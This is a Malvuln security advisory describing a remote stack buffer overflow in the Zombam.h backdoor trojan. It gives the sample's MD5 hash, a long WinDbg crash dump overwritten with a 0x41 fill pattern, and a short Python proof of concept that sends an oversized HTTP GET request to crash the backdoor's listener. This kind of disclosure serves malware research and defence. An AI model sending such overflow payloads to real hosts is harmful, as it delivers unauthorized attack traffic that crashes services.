Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/55feab480a43727c8a08feb7344afb4a.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Zombam.h Vulnerability: Remote Stack Buffer Overflow Description: Zombam.h HTTP RAT v01.b by z0mbie, creates a backdoor file named "httpserver.exe" that listens on TCP port 80. Attackers who can reach the backdoor can send HTTP GET request of about 6000 bytes to trigger buffer overflow corrupting the stack and overwriting EDX register. Type: PE32 MD5: 55feab480a43727c8a08feb7344afb4a Vuln ID: MVID-2021-0171 Dropped files: httpserver.exe ASLR: False DEP: False Safe SEH: True Disclosure: 04/14/2021 Memory Dump: (e54.874): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=048ffa24 edx=41414141 esi=00000003 edi=00000003 eip=773ced3c esp=048ff0bc ebp=048ff24c iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 773ced3c c21400 ret 14h 0:004> .ecxr eax=048ff9f4 ebx=040502b0 ecx=048ffa24 edx=41414141 esi=040502b0 edi=00404626 eip=004024f8 esp=048ff9dc ebp=048ffa2c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 *** WARNING: Unable to verify checksum for httpserver.exe *** ERROR: Module load completed but symbols could not be loaded for httpserver.exe httpserver+0x24f8: 004024f8 8b4204 mov eax,dword ptr [edx+4] ds:002b:41414145=???????? 0:004> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: httpserver+24f8 004024f8 8b4204 mov eax,dword ptr [edx+4] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 004024f8 (httpserver+0x000024f8) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414145 Attempt to read from address 41414145 PROCESS_NAME: httpserver.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 41414145 READ_ADDRESS: 41414145 FOLLOWUP_IP: httpserver+24f8 004024f8 8b4204 mov eax,dword ptr [edx+4] MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000874 BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 004020ac to 004024f8 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 048ffa2c 004020ac 41414141 048ffa40 00000415 httpserver+0x24f8 048ffaa4 41414141 41414141 41414141 41414141 httpserver+0x20ac 048ffaa8 41414141 41414141 41414141 41414141 0x41414141 048ffaac 41414141 41414141 41414141 41414141 0x41414141 048ffab0 41414141 41414141 41414141 41414141 0x41414141 048ffab4 41414141 41414141 41414141 41414141 0x41414141 048ffab8 41414141 41414141 41414141 41414141 0x41414141 048ffabc 41414141 41414141 41414141 41414141 0x41414141 048ffac0 41414141 41414141 41414141 41414141 0x41414141 048ffac4 41414141 41414141 41414141 41414141 0x41414141 048ffac8 41414141 41414141 41414141 41414141 0x41414141 048ffacc 41414141 41414141 41414141 41414141 0x41414141 048ffad0 41414141 41414141 41414141 41414141 0x41414141 048ffad4 41414141 41414141 41414141 41414141 0x41414141 048ffad8 41414141 41414141 41414141 41414141 0x41414141 048ffadc 41414141 41414141 41414141 41414141 0x41414141 048ffae0 41414141 41414141 41414141 41414141 0x41414141 048ffae4 41414141 41414141 41414141 41414141 0x41414141 048ffae8 41414141 41414141 41414141 41414141 0x41414141 048ffaec 41414141 41414141 41414141 41414141 0x41414141 048ffaf0 41414141 41414141 41414141 41414141 0x41414141 048ffaf4 41414141 41414141 41414141 41414141 0x41414141 048ffaf8 41414141 41414141 41414141 41414141 0x41414141 048ffafc 41414141 41414141 41414141 41414141 0x41414141 048ffb00 41414141 41414141 41414141 41414141 0x41414141 048ffb04 41414141 41414141 41414141 41414141 0x41414141 048ffb08 41414141 41414141 41414141 41414141 0x41414141 048ffb0c 41414141 41414141 41414141 41414141 0x41414141 048ffb10 41414141 41414141 41414141 41414141 0x41414141 048ffb14 41414141 41414141 41414141 41414141 0x41414141 048ffb18 41414141 41414141 41414141 41414141 0x41414141 048ffb1c 41414141 41414141 41414141 41414141 0x41414141 048ffb20 41414141 41414141 41414141 41414141 0x41414141 048ffb24 41414141 41414141 41414141 41414141 0x41414141 048ffb28 41414141 41414141 41414141 41414141 0x41414141 048ffb2c 41414141 41414141 41414141 41414141 0x41414141 048ffb30 41414141 41414141 41414141 41414141 0x41414141 048ffb34 41414141 41414141 41414141 41414141 0x41414141 048ffb38 41414141 41414141 41414141 41414141 0x41414141 048ffb3c 41414141 41414141 41414141 41414141 0x41414141 048ffb40 41414141 41414141 41414141 41414141 0x41414141 048ffb44 41414141 41414141 41414141 41414141 0x41414141 048ffb48 41414141 41414141 41414141 41414141 0x41414141 048ffb4c 41414141 41414141 41414141 41414141 0x41414141 048ffb50 41414141 41414141 41414141 41414141 0x41414141 048ffb54 41414141 41414141 41414141 41414141 0x41414141 048ffb58 41414141 41414141 41414141 41414141 0x41414141 048ffb5c 41414141 41414141 41414141 41414141 0x41414141 048ffb60 41414141 41414141 41414141 41414141 0x41414141 048ffb64 41414141 41414141 41414141 41414141 0x41414141 048ffb68 41414141 41414141 41414141 41414141 0x41414141 048ffb6c 41414141 41414141 41414141 41414141 0x41414141 048ffb70 41414141 41414141 41414141 41414141 0x41414141 048ffb74 41414141 41414141 41414141 41414141 0x41414141 048ffb78 41414141 41414141 41414141 41414141 0x41414141 048ffb7c 41414141 41414141 41414141 41414141 0x41414141 048ffb80 41414141 41414141 41414141 41414141 0x41414141 048ffb84 41414141 41414141 41414141 41414141 0x41414141 048ffb88 41414141 41414141 41414141 41414141 0x41414141 048ffb8c 41414141 41414141 41414141 41414141 0x41414141 048ffb90 41414141 41414141 41414141 41414141 0x41414141 048ffb94 41414141 41414141 41414141 41414141 0x41414141 048ffb98 41414141 41414141 41414141 41414141 0x41414141 048ffb9c 41414141 41414141 41414141 41414141 0x41414141 048ffba0 41414141 41414141 41414141 41414141 0x41414141 048ffba4 41414141 41414141 41414141 41414141 0x41414141 048ffba8 41414141 41414141 41414141 41414141 0x41414141 048ffbac 41414141 41414141 41414141 41414141 0x41414141 048ffbb0 41414141 41414141 41414141 41414141 0x41414141 048ffbb4 41414141 41414141 41414141 41414141 0x41414141 048ffbb8 41414141 41414141 41414141 41414141 0x41414141 048ffbbc 41414141 41414141 41414141 41414141 0x41414141 048ffbc0 41414141 41414141 41414141 41414141 0x41414141 048ffbc4 41414141 41414141 41414141 41414141 0x41414141 048ffbc8 41414141 41414141 41414141 41414141 0x41414141 048ffbcc 41414141 41414141 41414141 41414141 0x41414141 048ffbd0 41414141 41414141 41414141 41414141 0x41414141 048ffbd4 41414141 41414141 41414141 41414141 0x41414141 048ffbd8 41414141 41414141 41414141 41414141 0x41414141 048ffbdc 41414141 41414141 41414141 41414141 0x41414141 048ffbe0 41414141 41414141 41414141 41414141 0x41414141 048ffbe4 41414141 41414141 41414141 41414141 0x41414141 048ffbe8 41414141 41414141 41414141 41414141 0x41414141 048ffbec 41414141 41414141 41414141 41414141 0x41414141 048ffbf0 41414141 41414141 41414141 41414141 0x41414141 048ffbf4 41414141 41414141 41414141 41414141 0x41414141 048ffbf8 41414141 41414141 41414141 41414141 0x41414141 048ffbfc 41414141 41414141 41414141 41414141 0x41414141 048ffc00 41414141 41414141 41414141 41414141 0x41414141 048ffc04 41414141 41414141 41414141 41414141 0x41414141 048ffc08 41414141 41414141 41414141 41414141 0x41414141 048ffc0c 41414141 41414141 41414141 41414141 0x41414141 048ffc10 41414141 41414141 41414141 41414141 0x41414141 048ffc14 41414141 41414141 41414141 41414141 0x41414141 048ffc18 41414141 41414141 41414141 41414141 0x41414141 048ffc1c 41414141 41414141 41414141 41414141 0x41414141 048ffc20 41414141 41414141 41414141 41414141 0x41414141 048ffc24 41414141 41414141 41414141 41414141 0x41414141 048ffc28 41414141 41414141 41414141 41414141 0x41414141 048ffc2c 41414141 41414141 41414141 41414141 0x41414141 048ffc30 41414141 41414141 41414141 41414141 0x41414141 048ffc34 41414141 41414141 41414141 41414141 0x41414141 048ffc38 41414141 41414141 41414141 41414141 0x41414141 048ffc3c 41414141 41414141 41414141 41414141 0x41414141 048ffc40 41414141 41414141 41414141 41414141 0x41414141 048ffc44 41414141 41414141 41414141 41414141 0x41414141 048ffc48 41414141 41414141 41414141 41414141 0x41414141 048ffc4c 41414141 41414141 41414141 41414141 0x41414141 048ffc50 41414141 41414141 41414141 41414141 0x41414141 048ffc54 41414141 41414141 41414141 41414141 0x41414141 048ffc58 41414141 41414141 41414141 41414141 0x41414141 048ffc5c 41414141 41414141 41414141 41414141 0x41414141 048ffc60 41414141 41414141 41414141 41414141 0x41414141 048ffc64 41414141 41414141 41414141 41414141 0x41414141 048ffc68 41414141 41414141 41414141 41414141 0x41414141 048ffc6c 41414141 41414141 41414141 41414141 0x41414141 048ffc70 41414141 41414141 41414141 41414141 0x41414141 048ffc74 41414141 41414141 41414141 41414141 0x41414141 048ffc78 41414141 41414141 41414141 41414141 0x41414141 048ffc7c 41414141 41414141 41414141 41414141 0x41414141 048ffc80 41414141 41414141 41414141 41414141 0x41414141 048ffc84 41414141 41414141 41414141 41414141 0x41414141 048ffc88 41414141 41414141 41414141 41414141 0x41414141 048ffc8c 41414141 41414141 41414141 41414141 0x41414141 048ffc90 41414141 41414141 41414141 41414141 0x41414141 048ffc94 41414141 41414141 41414141 41414141 0x41414141 048ffc98 41414141 41414141 41414141 41414141 0x41414141 048ffc9c 41414141 41414141 41414141 41414141 0x41414141 048ffca0 41414141 41414141 41414141 41414141 0x41414141 048ffca4 41414141 41414141 41414141 41414141 0x41414141 048ffca8 41414141 41414141 41414141 41414141 0x41414141 048ffcac 41414141 41414141 41414141 41414141 0x41414141 048ffcb0 41414141 41414141 41414141 41414141 0x41414141 048ffcb4 41414141 41414141 41414141 41414141 0x41414141 048ffcb8 41414141 41414141 41414141 41414141 0x41414141 048ffcbc 41414141 41414141 41414141 41414141 0x41414141 048ffcc0 41414141 41414141 41414141 41414141 0x41414141 048ffcc4 41414141 41414141 41414141 41414141 0x41414141 048ffcc8 41414141 41414141 41414141 41414141 0x41414141 048ffccc 41414141 41414141 41414141 41414141 0x41414141 048ffcd0 41414141 41414141 41414141 41414141 0x41414141 048ffcd4 41414141 41414141 41414141 41414141 0x41414141 048ffcd8 41414141 41414141 41414141 41414141 0x41414141 048ffcdc 41414141 41414141 41414141 41414141 0x41414141 048ffce0 41414141 41414141 41414141 41414141 0x41414141 048ffce4 41414141 41414141 41414141 41414141 0x41414141 048ffce8 41414141 41414141 41414141 41414141 0x41414141 048ffcec 41414141 41414141 41414141 41414141 0x41414141 048ffcf0 41414141 41414141 41414141 41414141 0x41414141 048ffcf4 41414141 41414141 41414141 41414141 0x41414141 048ffcf8 41414141 41414141 41414141 41414141 0x41414141 048ffcfc 41414141 41414141 41414141 41414141 0x41414141 048ffd00 41414141 41414141 41414141 41414141 0x41414141 048ffd04 41414141 41414141 41414141 41414141 0x41414141 048ffd08 41414141 41414141 41414141 41414141 0x41414141 048ffd0c 41414141 41414141 41414141 41414141 0x41414141 048ffd10 41414141 41414141 41414141 41414141 0x41414141 048ffd14 41414141 41414141 41414141 41414141 0x41414141 048ffd18 41414141 41414141 41414141 41414141 0x41414141 048ffd1c 41414141 41414141 41414141 41414141 0x41414141 048ffd20 41414141 41414141 41414141 41414141 0x41414141 048ffd24 41414141 41414141 41414141 41414141 0x41414141 048ffd28 41414141 41414141 41414141 41414141 0x41414141 048ffd2c 41414141 41414141 41414141 41414141 0x41414141 048ffd30 41414141 41414141 41414141 41414141 0x41414141 048ffd34 41414141 41414141 41414141 41414141 0x41414141 048ffd38 41414141 41414141 41414141 41414141 0x41414141 048ffd3c 41414141 41414141 41414141 41414141 0x41414141 048ffd40 41414141 41414141 41414141 41414141 0x41414141 048ffd44 41414141 41414141 41414141 41414141 0x41414141 048ffd48 41414141 41414141 41414141 41414141 0x41414141 048ffd4c 41414141 41414141 41414141 41414141 0x41414141 048ffd50 41414141 41414141 41414141 41414141 0x41414141 048ffd54 41414141 41414141 41414141 41414141 0x41414141 048ffd58 41414141 41414141 41414141 41414141 0x41414141 048ffd5c 41414141 41414141 41414141 41414141 0x41414141 048ffd60 41414141 41414141 41414141 41414141 0x41414141 048ffd64 41414141 41414141 41414141 41414141 0x41414141 048ffd68 41414141 41414141 41414141 41414141 0x41414141 048ffd6c 41414141 41414141 41414141 41414141 0x41414141 048ffd70 41414141 41414141 41414141 41414141 0x41414141 048ffd74 41414141 41414141 41414141 41414141 0x41414141 048ffd78 41414141 41414141 41414141 41414141 0x41414141 048ffd7c 41414141 41414141 41414141 41414141 0x41414141 048ffd80 41414141 41414141 41414141 41414141 0x41414141 048ffd84 41414141 41414141 41414141 41414141 0x41414141 048ffd88 41414141 41414141 41414141 41414141 0x41414141 048ffd8c 41414141 41414141 41414141 41414141 0x41414141 048ffd90 41414141 41414141 41414141 41414141 0x41414141 048ffd94 41414141 41414141 41414141 41414141 0x41414141 048ffd98 41414141 41414141 41414141 41414141 0x41414141 048ffd9c 41414141 41414141 41414141 41414141 0x41414141 048ffda0 41414141 41414141 41414141 41414141 0x41414141 048ffda4 41414141 41414141 41414141 41414141 0x41414141 048ffda8 41414141 41414141 41414141 41414141 0x41414141 048ffdac 41414141 41414141 41414141 41414141 0x41414141 048ffdb0 41414141 41414141 41414141 41414141 0x41414141 048ffdb4 41414141 41414141 41414141 41414141 0x41414141 048ffdb8 41414141 41414141 41414141 41414141 0x41414141 048ffdbc 41414141 41414141 41414141 41414141 0x41414141 048ffdc0 41414141 41414141 41414141 41414141 0x41414141 048ffdc4 41414141 41414141 41414141 41414141 0x41414141 048ffdc8 41414141 41414141 41414141 41414141 0x41414141 048ffdcc 41414141 41414141 41414141 41414141 0x41414141 048ffdd0 41414141 41414141 41414141 41414141 0x41414141 048ffdd4 41414141 41414141 41414141 41414141 0x41414141 048ffdd8 41414141 41414141 41414141 41414141 0x41414141 048ffddc 41414141 41414141 41414141 41414141 0x41414141 048ffde0 41414141 41414141 41414141 41414141 0x41414141 048ffde4 41414141 41414141 41414141 41414141 0x41414141 048ffde8 41414141 41414141 41414141 41414141 0x41414141 048ffdec 41414141 41414141 41414141 41414141 0x41414141 048ffdf0 41414141 41414141 41414141 41414141 0x41414141 048ffdf4 41414141 41414141 41414141 41414141 0x41414141 048ffdf8 41414141 41414141 41414141 41414141 0x41414141 048ffdfc 41414141 41414141 41414141 41414141 0x41414141 048ffe00 41414141 41414141 41414141 41414141 0x41414141 048ffe04 41414141 41414141 41414 STACK_COMMAND: ~4s; .ecxr ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: httpserver+24f8 FOLLOWUP_NAME: MachineOwner MODULE_NAME: httpserver IMAGE_NAME: httpserver.exe DEBUG_FLR_IMAGE_TIMESTAMP: 3eb4a8cc FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_httpserver.exe!Unknown BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_httpserver+24f8 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=80 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PBARBAR="GET /"+"A"*6000+"HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n" s.send(PBARBAR) s.close() print("Backdoor.Win32.Zombam.h / Remote Stack Buffer Overflow") print("MD5: 55feab480a43727c8a08feb7344afb4a") print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).